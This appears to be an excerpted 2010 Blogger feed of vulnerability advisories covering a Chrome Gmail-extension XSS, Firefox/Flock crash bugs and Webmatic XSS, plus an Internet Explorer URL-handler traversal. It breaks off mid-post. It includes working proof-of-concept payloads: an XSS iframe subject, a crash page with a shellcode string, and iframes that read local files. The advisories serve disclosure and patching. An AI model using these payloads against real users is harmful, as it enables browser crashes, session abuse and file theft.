term="security" /><category scheme="http://www.blogger.com/atom/ns#" term="patch" /><title>Gmail Checker plus Chrome extension XSS</title><content type="html">######################################&lt;br /&gt;
Gmail Checker plus Chrome extension XSS&lt;br /&gt;
extension: https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe&lt;br /&gt;
advisore:http://lostmon.blogspot.com/2010/06/gmail-checker-plus-chrome-extension-xss.html&lt;br /&gt;
Exploit available:yes&lt;br /&gt;
#######################################&lt;br /&gt;
&lt;br /&gt;
So in this case "Google Mail Checker Plus" version 1.1.7 (2010-02-10)&lt;br /&gt;
has a flaw that allow attackers to make XSS style attacks.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;All extensions runs over his origin and no have way to altered data from extension or get sensitive data like , email account or password etc..&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
if we look how many users have instaled this extension =&gt;&lt;br /&gt;
https://chrome.google.com/extensions/detail/gffjhibehnempbkeheiccaincokdjbfe&lt;br /&gt;
303,711 users have instaled it (WoW)&lt;br /&gt;
&lt;br /&gt;
############&lt;br /&gt;
explanation&lt;br /&gt;
############&lt;br /&gt;
&lt;br /&gt;
Google Mail Checker Plus allows users to view wen they have a new mail and&lt;br /&gt;
view a preview of the mail ....&lt;br /&gt;
&lt;br /&gt;
if a attacker compose a new mail with html or javascript code in subject form field and send it to victim´s the  code is executed wen Victim´s click in the extension to view the mail and wen victim´s accept the alert and view a preview of mail the iframe is executed too.&lt;br /&gt;
&lt;br /&gt;
Gmail is a safe place , but the extension to manage it can be a potential&lt;br /&gt;
vector to attack it.&lt;br /&gt;
&lt;br /&gt;
For example send a email With a logout acction in gmail in subject&lt;br /&gt;
"&amp;gt;&amp;lt;iframe src="https://mail.google.com/mail/?logout&amp;hl=es"&amp;gt;&amp;lt;/iframe&amp;gt;&lt;br /&gt;
it closes the sesion on gmmail , this is a XSRF , and , in the case what you say aa&lt;br /&gt;
it is executed in  context and the location.href value is "about:blank" &lt;br /&gt;
&lt;br /&gt;
So we have dispute it in http://code.google.com/p/chromium/issues/detail?id=45401&lt;br /&gt;
The developer has release a patch version in trunk =&gt; &lt;br /&gt;
http://github.com/AndersSahlin/MailCheckerPlus/blob/54ab118e505feae819e676c8e525e8fe5409c981/src/mailaccount.class.js&lt;br /&gt;
please donload it and copy  to your extension folder to solve it.&lt;br /&gt;
&lt;br /&gt;
See Diff =&gt; http://github.com/AndersSahlin/MailCheckerPlus/commit/54ab118e505feae819e676c8e525e8fe5409c981#diff-0&lt;br /&gt;
&lt;br /&gt;
######################€nd#################################&lt;br /&gt;
.&lt;br /&gt;
&lt;br /&gt;
Thnx for your time !!!&lt;br /&gt;
&lt;br /&gt;
atentamente:&lt;br /&gt;
Lostmon (lostmon@gmail.com)&lt;br /&gt;
Web-Blog: http://lostmon.blogspot.com/&lt;br /&gt;
Google group: http://groups.google.com/group/lostmon (new)&lt;br /&gt;
--&lt;br /&gt;
La curiosidad es lo que hace mover la mente....&lt;div class="blogger-post-footer"&gt;Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-4565582108330409150?l=lostmon.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/EmEWhRuIfcqbMc_pb8lpWo6roXY/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/EmEWhRuIfcqbMc_pb8lpWo6roXY/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/EmEWhRuIfcqbMc_pb8lpWo6roXY/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/EmEWhRuIfcqbMc_pb8lpWo6roXY/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/V4qqQ28Edd0" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/4565582108330409150?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/4565582108330409150?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/LostmonBlogger/~3/V4qqQ28Edd0/gmail-checker-plus-chrome-extension-xss.html" title="Gmail Checker plus Chrome extension XSS" /><author><name>Lostmon</name><uri>http://www.blogger.com/profile/12070694315455553235</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://3.bp.blogspot.com/-5DGRJl6Jr6M/ToB1VFVQYRI/AAAAAAAAAFQ/OPxHyYkIkNU/s220/avatar.jpg" /></author><feedburner:origLink>http://lostmon.blogspot.com/2010/06/gmail-checker-plus-chrome-extension-xss.html</feedburner:origLink></entry><entry gd:etag="W/&quot;Ak8HQXk8cCp7ImA9WxFTGEk.&quot;"><id>tag:blogger.com,1999:blog-9011578.post-5885354846302939622</id><published>2010-04-09T23:30:00.001+02:00</published><updated>2010-04-09T23:33:50.778+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-04-09T23:33:50.778+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="DoS" /><category scheme="http://www.blogger.com/atom/ns#" term="bug" /><category scheme="http://www.blogger.com/atom/ns#" term="browsers" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><category scheme="http://www.blogger.com/atom/ns#" term="crash" /><title>Firefox 3.6.2 &amp; 3.6.3 and flock 2.5 browsers uncaught excepcion DoS</title><content type="html">##################################&lt;br /&gt;
Firefox 3.6.2 &amp; 3.6.3 and flock 2.5 browsers uncaught excepcion&lt;br /&gt;
error console DoS&lt;br /&gt;
Vendor URL:http://www.mozilla.com&lt;br /&gt;
vendor URL:http://www.flock.com/&lt;br /&gt;
Advisore:http://lostmon.blogspot.com/2010/04/firefox-362-363-and-flock-25-browsers.html&lt;br /&gt;
###################################&lt;br /&gt;
&lt;br /&gt;
Firefox and Flock Browsers can hang with a malformed page,&lt;br /&gt;
and wen try to view error console firefox and flock crash &lt;br /&gt;
due to a uncaught excepcion and this is a out of memory &lt;br /&gt;
error.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
################&lt;br /&gt;
Versions&lt;br /&gt;
################&lt;br /&gt;
&lt;br /&gt;
firefox 3.6.2 and 3.6.3 vulnerable&lt;br /&gt;
Bugzilla:&lt;br /&gt;
https://bugzilla.mozilla.org/show_bug.cgi?id=557228&lt;br /&gt;
&lt;br /&gt;
Flock 2.5 vulnerable&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
#################&lt;br /&gt;
Proof of Concept&lt;br /&gt;
#################&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
&amp;lt;head&amp;gt;&lt;br /&gt;
&amp;lt;title&amp;gt; Bad 'throw' exception Remote DoS Flock browser 2.5 firefox 3.6.2 &amp; 3.6.3&amp;lt;/title&amp;gt;&lt;br /&gt;
&amp;lt;/head&amp;gt;&lt;br /&gt;
&amp;lt;body onload="javascript:alert('Please Press Ctrl+Shift+J');"&amp;gt;&lt;br /&gt;
&amp;lt;script language='JavaScript'&amp;gt;&lt;br /&gt;
var n=unescape('%uf1a4%u7ffd');&lt;br /&gt;
&amp;lt;!-- variant var n=unescape('%uc0c0%uc0c0%uc0c0'); --!&amp;gt;&lt;br /&gt;
&amp;lt;!-- Shellcode calc.exe but does not work --!&amp;gt;&lt;br /&gt;
var s=unescape('%uf631%u6456%u768b%u8b30%u0c76%u768b%u8b1c%u086e%u368b%u5d8b%u8b3c%u1d5c%u0178%u8beb%u184b%u7b8b%u0120%u8bef%u8f7c%u01fc%u31ef%u99c0%u1732%uc166%u01ca%u75ae%u66f7%ufa81%uf510%ue2e0%ucf75%u538b%u0124%u0fea%u14b7%u8b4a%u1c7b%uef01%u2c03%u6897%u652e%u6578%u6368%u6c61%u5463%u0487%u5024%ud5ffÌ');&lt;br /&gt;
for(var i=0;i&amp;lt;64;i++){&lt;br /&gt;
n=n+n;&lt;br /&gt;
document.write('&amp;lt;script&amp;gt;throw n+s;&amp;lt;/scr'+'ipt&amp;gt;');&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;/head&amp;gt;&lt;br /&gt;
&amp;lt;body&amp;gt;&lt;br /&gt;
&amp;lt;center&amp;gt;&amp;lt;h1&amp;gt;  Bad 'throw' exception Remote DoS on firefox 3.6.x and Flock browser 2.5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
&amp;lt;h3&amp;gt;Based on the exploit from  &amp;lt;a href="http://hacksafe.blogspot.com/"&amp;gt;Nishant Das Patnaik&amp;lt;/a&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Exploit modified by &amp;lt;a href="http://lostmon.blogspot.com"&amp;gt;Lostmon&amp;lt;/a&amp;gt; Lostmon@gmail.com to affects Flock and Firefox.&lt;br /&gt;
Remember to press ctrl+shift+j and make sure that your console log is in "all" tab or in "errors" tab , in firefox and flock :)&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/center&amp;gt;&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
###################€nd ##########################&lt;br /&gt;
&lt;br /&gt;
Thns to estrella to be my ligth&lt;br /&gt;
-- &lt;br /&gt;
atentamente:&lt;br /&gt;
Lostmon (lostmon@gmail.com)&lt;br /&gt;
Web-Blog: http://lostmon.blogspot.com/&lt;br /&gt;
Google group: http://groups.google.com/group/lostmon (new)&lt;br /&gt;
--&lt;br /&gt;
La curiosidad es lo que hace mover la mente....&lt;div class="blogger-post-footer"&gt;Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-5885354846302939622?l=lostmon.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/F7FsPmf5X2NMc4Zjy1RudbMRv5w/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/F7FsPmf5X2NMc4Zjy1RudbMRv5w/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/F7FsPmf5X2NMc4Zjy1RudbMRv5w/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/F7FsPmf5X2NMc4Zjy1RudbMRv5w/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/eYIMi21WQU8" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/5885354846302939622?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/5885354846302939622?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/LostmonBlogger/~3/eYIMi21WQU8/firefox-362-363-and-flock-25-browsers.html" title="Firefox 3.6.2 &amp; 3.6.3 and flock 2.5 browsers uncaught excepcion DoS" /><author><name>Lostmon</name><uri>http://www.blogger.com/profile/12070694315455553235</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://3.bp.blogspot.com/-5DGRJl6Jr6M/ToB1VFVQYRI/AAAAAAAAAFQ/OPxHyYkIkNU/s220/avatar.jpg" /></author><feedburner:origLink>http://lostmon.blogspot.com/2010/04/firefox-362-363-and-flock-25-browsers.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEMMQnYzfSp7ImA9WxFTEU4.&quot;"><id>tag:blogger.com,1999:blog-9011578.post-6286988107260031889</id><published>2010-04-01T16:33:00.002+02:00</published><updated>2010-04-01T16:34:43.885+02:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-04-01T16:34:43.885+02:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="DoS" /><category scheme="http://www.blogger.com/atom/ns#" term="bug" /><category scheme="http://www.blogger.com/atom/ns#" term="browsers" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><title>Flock browser marquee tag DoS</title><content type="html">############################################&lt;br /&gt;
Flock browser marquee tag DoS &lt;br /&gt;
advisore:http://lostmon.blogspot.com/2010/04/flock-browser-marquee-tag-dos.html&lt;br /&gt;
############################################&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Flock browser contains a flaw that may allow a remote denial of service.&lt;br /&gt;
The issue is triggered when an Victim visit a specially crafted web page&lt;br /&gt;
with a lot of marquee html tag and it will result in loss of availability&lt;br /&gt;
( DoS ) for Browser and posible memory corruption.&lt;br /&gt;
&lt;br /&gt;
This bug was first discover by '599eme Man flouf@live.fr' and this &lt;br /&gt;
is a extended research about it, he was discovered in those browsers:&lt;br /&gt;
Opera 10.10&lt;br /&gt;
Firefox 3.5.7&lt;br /&gt;
Safari 4.0.4&lt;br /&gt;
SeaMonkey 2.0.1&lt;br /&gt;
&lt;br /&gt;
and i test it in :&lt;br /&gt;
&lt;br /&gt;
Flock Browser 1.2.6 vulnerable&lt;br /&gt;
Flock Browser 2.5  vulnerable&lt;br /&gt;
&lt;br /&gt;
a sample code can be found/download here =&gt; &lt;br /&gt;
http://www.exploit-db.com/exploits/11347&lt;br /&gt;
&lt;br /&gt;
########################€nd ###################&lt;br /&gt;
&lt;br /&gt;
Thns to estrella to be my ligth&lt;br /&gt;
-- &lt;br /&gt;
atentamente:&lt;br /&gt;
Lostmon (lostmon@gmail.com)&lt;br /&gt;
Web-Blog: http://lostmon.blogspot.com/&lt;br /&gt;
Google group: http://groups.google.com/group/lostmon (new)&lt;br /&gt;
--&lt;br /&gt;
La curiosidad es lo que hace mover la mente....&lt;div class="blogger-post-footer"&gt;Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-6286988107260031889?l=lostmon.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/vNw2cqWz-b94hIXs4SyzH5CZxyI/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/vNw2cqWz-b94hIXs4SyzH5CZxyI/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/vNw2cqWz-b94hIXs4SyzH5CZxyI/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/vNw2cqWz-b94hIXs4SyzH5CZxyI/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/IilmW1EfhVY" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/6286988107260031889?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/6286988107260031889?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/LostmonBlogger/~3/IilmW1EfhVY/flock-browser-marquee-tag-dos.html" title="Flock browser marquee tag DoS" /><author><name>Lostmon</name><uri>http://www.blogger.com/profile/12070694315455553235</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://3.bp.blogspot.com/-5DGRJl6Jr6M/ToB1VFVQYRI/AAAAAAAAAFQ/OPxHyYkIkNU/s220/avatar.jpg" /></author><feedburner:origLink>http://lostmon.blogspot.com/2010/04/flock-browser-marquee-tag-dos.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUICRHY4fCp7ImA9WxBaEE0.&quot;"><id>tag:blogger.com,1999:blog-9011578.post-5881705757588341602</id><published>2010-03-19T15:03:00.002+01:00</published><updated>2010-03-19T15:06:05.834+01:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-19T15:06:05.834+01:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="bug" /><category scheme="http://www.blogger.com/atom/ns#" term="XSS" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><title>Webmatic 3.0.3 Multiple cross.site scripting</title><content type="html">#################################&lt;br /&gt;
Webmatic 3.0.3 Multiple cross.site scripting&lt;br /&gt;
Vendor URL:http://www.valarsoft.com/&lt;br /&gt;
Advisore: http://lostmon.blogspot.com/2010/03/webmatic-303-multiple-crosssite.html&lt;br /&gt;
Vendor notified: YES&lt;br /&gt;
#################################&lt;br /&gt;
&lt;br /&gt;
Webmatic contains a flaw that allows a remote cross site&lt;br /&gt;
scripting attack. This flaw exists because the application&lt;br /&gt;
does not validate multiple variables and form fields upon&lt;br /&gt;
submission to the 'index.php' script. This could allow a &lt;br /&gt;
user to create a specially crafted URL that would execute&lt;br /&gt;
arbitrary code in a user's browser within the trust relationship&lt;br /&gt;
between the browser and the server, leading to a loss of integrity.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
##############&lt;br /&gt;
Versions&lt;br /&gt;
##############&lt;br /&gt;
&lt;br /&gt;
valarsoft webmatic 3.0.3&lt;br /&gt;
&lt;br /&gt;
It´s posible that prior versions&lt;br /&gt;
are afected&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
################&lt;br /&gt;
TimeLIne&lt;br /&gt;
##############&lt;br /&gt;
&lt;br /&gt;
Discovered 13-01-2010&lt;br /&gt;
Vendor notify: 14-03-2010&lt;br /&gt;
vendor response:15-03-2010&lt;br /&gt;
Disclosure: 19-03-2010&lt;br /&gt;
&lt;br /&gt;
###############&lt;br /&gt;
Private messages&lt;br /&gt;
################&lt;br /&gt;
&lt;br /&gt;
Subject field form is vulnerable&lt;br /&gt;
&lt;br /&gt;
a attacker can compose a PM with a malformed title&lt;br /&gt;
and it is executed wen the victims view his inbox &lt;br /&gt;
or open  the PM.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
#################&lt;br /&gt;
Forums&lt;br /&gt;
#################&lt;br /&gt;
&lt;br /&gt;
Search field form ,filer variable&lt;br /&gt;
and title form field affected.&lt;br /&gt;
&lt;br /&gt;
a attacker can compose a post with a malformed title&lt;br /&gt;
and wen a victim try to browse the forum the xss is &lt;br /&gt;
executed, also the attacker can compose a search url&lt;br /&gt;
with xss in filter variable or put the xss  in search&lt;br /&gt;
form field to execute it.&lt;br /&gt;
&lt;br /&gt;
##################&lt;br /&gt;
Chat room&lt;br /&gt;
###################&lt;br /&gt;
&lt;br /&gt;
Nickname form field affected&lt;br /&gt;
&lt;br /&gt;
a attacker can use a malformed nick name with xss and&lt;br /&gt;
wen he join in a channel the xss is executed in all&lt;br /&gt;
channel´s users.&lt;br /&gt;
&lt;br /&gt;
######################&lt;br /&gt;
News&lt;br /&gt;
####################&lt;br /&gt;
&lt;br /&gt;
Title form filed affected&lt;br /&gt;
&lt;br /&gt;
a attacker can compose a new with a malformed title and &lt;br /&gt;
wen a user browse the news sections the xss is executed&lt;br /&gt;
also if the new has a "resume" in home page, all users &lt;br /&gt;
wen load the page are afected by xss.&lt;br /&gt;
&lt;br /&gt;
pg variable affected&lt;br /&gt;
&lt;br /&gt;
a attacker can compose a malformed URL in news sections and &lt;br /&gt;
insert some xss code in 'pg' variable , wen a victim clink in&lt;br /&gt;
this url the xss is executed.&lt;br /&gt;
&lt;br /&gt;
#########################&lt;br /&gt;
banners section&lt;br /&gt;
#########################&lt;br /&gt;
&lt;br /&gt;
Title and label form fields&lt;br /&gt;
&lt;br /&gt;
A remote user can add a banner&lt;br /&gt;
with a malformed title or/and malformed label&lt;br /&gt;
wen the attacker visit his banner the xss is executed&lt;br /&gt;
in his own banner management.&lt;br /&gt;
Also if a victim visit this banner the xss is executed.&lt;br /&gt;
&lt;br /&gt;
############################€ND#############################&lt;br /&gt;
&lt;br /&gt;
Thns to estrella to be my ligth&lt;br /&gt;
-- &lt;br /&gt;
atentamente:&lt;br /&gt;
Lostmon (lostmon@gmail.com)&lt;br /&gt;
Web-Blog: http://lostmon.blogspot.com/&lt;br /&gt;
Google group: http://groups.google.com/group/lostmon (new)&lt;br /&gt;
--&lt;br /&gt;
La curiosidad es lo que hace mover la mente....&lt;div class="blogger-post-footer"&gt;Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9011578-5881705757588341602?l=lostmon.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/_j1DBsVo18rUtOEmtBkKDBY5Cqg/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/_j1DBsVo18rUtOEmtBkKDBY5Cqg/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/_j1DBsVo18rUtOEmtBkKDBY5Cqg/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/_j1DBsVo18rUtOEmtBkKDBY5Cqg/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/LostmonBlogger/~4/MV-1aj07mbI" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/5881705757588341602?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9011578/posts/default/5881705757588341602?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/LostmonBlogger/~3/MV-1aj07mbI/webmatic-303-multiple-crosssite.html" title="Webmatic 3.0.3 Multiple cross.site scripting" /><author><name>Lostmon</name><uri>http://www.blogger.com/profile/12070694315455553235</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://3.bp.blogspot.com/-5DGRJl6Jr6M/ToB1VFVQYRI/AAAAAAAAAFQ/OPxHyYkIkNU/s220/avatar.jpg" /></author><feedburner:origLink>http://lostmon.blogspot.com/2010/03/webmatic-303-multiple-crosssite.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUQNSXs-cCp7ImA9WxBWGE4.&quot;"><id>tag:blogger.com,1999:blog-9011578.post-7907124762738658800</id><published>2010-02-10T21:01:00.007+01:00</published><updated>2010-02-10T21:23:18.558+01:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-02-10T21:23:18.558+01:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="bug" /><category scheme="http://www.blogger.com/atom/ns#" term="browsers" /><category scheme="http://www.blogger.com/atom/ns#" term="vulnerability" /><category scheme="http://www.blogger.com/atom/ns#" term="Acknowledgments" /><category scheme="http://www.blogger.com/atom/ns#" term="security" /><category scheme="http://www.blogger.com/atom/ns#" term="patch" /><title>Internet explorer 7 &amp; 8 URL Validation Vulnerability</title><content type="html">############################################&lt;br /&gt;Internet explorer 7 &amp; 8 url validation vulnerability&lt;br /&gt;Original Advisore: http://lostmon.blogspot.com/&lt;br /&gt;2010/02/internet-explorer-7-8-url-validation.html&lt;br /&gt;Vendor URl: http://www.microsoft.com&lt;br /&gt;related adv:http://lostmon.blogspot.com/&lt;br /&gt;2010/02/internet-explorer-6-7-8-url-validation.html&lt;br /&gt;related bulletin: MS10-002 and ms10-007&lt;br /&gt;Related CVE 2010-0027&lt;br /&gt;Related OSVDB ID: 62245  and 62245 &lt;br /&gt;Related Secunia: SA38501 and SA38209&lt;br /&gt;Related BID: 37884&lt;br /&gt;############################################&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;############&lt;br /&gt;Description&lt;br /&gt;############&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;A remote code execution vulnerability exists in the way&lt;br /&gt;that Internet Explorer incorrectly validates input. An&lt;br /&gt;attacker could exploit the vulnerability by constructing&lt;br /&gt;a specially crafted URL. When a user clicks the URL, the&lt;br /&gt;vulnerability could allow remote code execution. An&lt;br /&gt;attacker who successfully exploited this vulnerability&lt;br /&gt;could gain the same user rights as the logged-on user.&lt;br /&gt;If a user is logged on with administrative user rights,&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#################&lt;br /&gt;Versions afected&lt;br /&gt;#################&lt;br /&gt;&lt;br /&gt;I have tested in Internet Explorer 7 &amp; 8&lt;br /&gt;in this versions of windows&lt;br /&gt;&lt;br /&gt;All versions of Windows 7&lt;br /&gt;Windows xp home&lt;br /&gt;Windows xs pro&lt;br /&gt;&lt;br /&gt;So you can look the explotability index&lt;br /&gt;From Relared Microsoft bulletin to get&lt;br /&gt;a complete List of products affected.&lt;br /&gt;&lt;br /&gt;#############&lt;br /&gt;Timeline&lt;br /&gt;#############&lt;br /&gt;&lt;br /&gt;discovered 05-11-2009&lt;br /&gt;Reported to vendor 15-11-2009&lt;br /&gt;Vendor response:15-11-2009&lt;br /&gt;vendor accepts in case manager 19-11-2009&lt;br /&gt;vendor patch 21-01-2010&lt;br /&gt;Vendor Patch2:09-02-2010&lt;br /&gt;Public Disclosure: 21-01-2010&lt;br /&gt;Details Disclosure:10-02-2010&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;##############&lt;br /&gt;Solution&lt;br /&gt;##############&lt;br /&gt;&lt;br /&gt;See &lt;br /&gt;http://www.microsoft.com/technet/security/Bulletin/ms10-002.mspx&lt;br /&gt;and &lt;br /&gt;http://www.microsoft.com/technet/security/Bulletin/ms10-007.mspx&lt;br /&gt;&lt;br /&gt;for more details and for download vendor's patch&lt;br /&gt;&lt;br /&gt;#######################&lt;br /&gt;Sample code and PoC´s&lt;br /&gt;#######################&lt;br /&gt;&lt;br /&gt;This Vulnerability is bassed in the way&lt;br /&gt;that Internet explorer validate Uri handlers&lt;br /&gt;and the special chart '#'&lt;br /&gt;&lt;br /&gt;for testing and undestanding first open internet explorer&lt;br /&gt;and write in teh address bar a fake handler like `handler:' &lt;br /&gt;it cause that IE  shows 'res://ieframe.dll/unknownprotocol.htm'&lt;br /&gt;internal page , because the protocol is unknow.&lt;br /&gt;if we do =&gt; handler:http://[some-host]' Ie wait to open &lt;br /&gt;the host, but don´t show any error or unknow protocol &lt;br /&gt;error page.&lt;br /&gt;&lt;br /&gt;If we Write at the adrress bar 'handler:handler2:'&lt;br /&gt;IE shows again 'res://ieframe.dll/unknownprotocol.htm' page.&lt;br /&gt;&lt;br /&gt;But if we concatenate two unknow protocol handlers and &lt;br /&gt;use the special char '#' like 'handler:handler#:'&lt;br /&gt;internet explorer shows a alert warning&lt;br /&gt;with 'internet explorer can´t find file:///'&lt;br /&gt;&lt;br /&gt;With this convination IE use file: protocol handler.&lt;br /&gt;&lt;br /&gt;With this alert we can think... if we concatenate two handlers and #&lt;br /&gt;char and a file path we can access to files on the hard disk.&lt;br /&gt;&lt;br /&gt;"handler:handler#:c:\windows\calc.exe'&lt;br /&gt;But we get again 'internet explorer can´t find the file'&lt;br /&gt;&lt;br /&gt;Them we look for trasversal file access like&lt;br /&gt;handler:handler#:../../../../C:\windows/calc.exe’&lt;br /&gt;Them Ie promp us to download or execute the file.&lt;br /&gt;we have bypass the restrictions!!!&lt;br /&gt;&lt;br /&gt;so we are working in the address bar&lt;br /&gt;Can a web page use this issue to make the same and ask&lt;br /&gt;for download it ?  YES&lt;br /&gt;&lt;br /&gt;we can construct a web page with a iframe like:&lt;br /&gt;&lt;br /&gt;############# PoC one #################&lt;br /&gt;&amp;lt;html&amp;gt;&lt;br /&gt;&amp;lt;iframe id="myIframe"&lt;br /&gt;src="handler:handler#:../../../../C:\windows/calc.exe"&gt;&lt;/iframe&amp;gt;&lt;br /&gt;&amp;lt;/html&amp;gt;&lt;br /&gt;################# EOF #################&lt;br /&gt;&lt;br /&gt;If we open it via local folder, or via local server or&lt;br /&gt;lan server or remote server, in all cases iE ask for download&lt;br /&gt;&lt;br /&gt;them we can access any file in the hard disk so&lt;br /&gt;can we execute or read the content of a file ?? YES&lt;br /&gt;&lt;br /&gt;if we know a txt file path we can do similar&lt;br /&gt;( put a txt file in c: root and wite some content it)&lt;br /&gt;and them :&lt;br /&gt;&lt;br /&gt;############## PoC Two #############&lt;br /&gt;&amp;lt;html&amp;gt;&lt;br /&gt;&amp;lt;iframe id="myIframe"&lt;br /&gt;src="handler:handler#:../../../../C:\our_txtfile.txt"&gt;&lt;/iframe&amp;gt;&lt;br /&gt;&amp;lt;/html&amp;gt;&lt;br /&gt;&lt;br /&gt;############# EOF #################&lt;br /&gt;&lt;br /&gt;wen we open this Poc , it read the content from our_txtfile.txt&lt;br /&gt;and show it in the frame.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;we can execute files ?? YES&lt;br /&gt;&lt;br /&gt;we can execute a html file or xml file or search-ms files&lt;br /&gt;from hard disk for example:&lt;br /&gt;&lt;br /&gt;############# PoC Tree ###############&lt;br 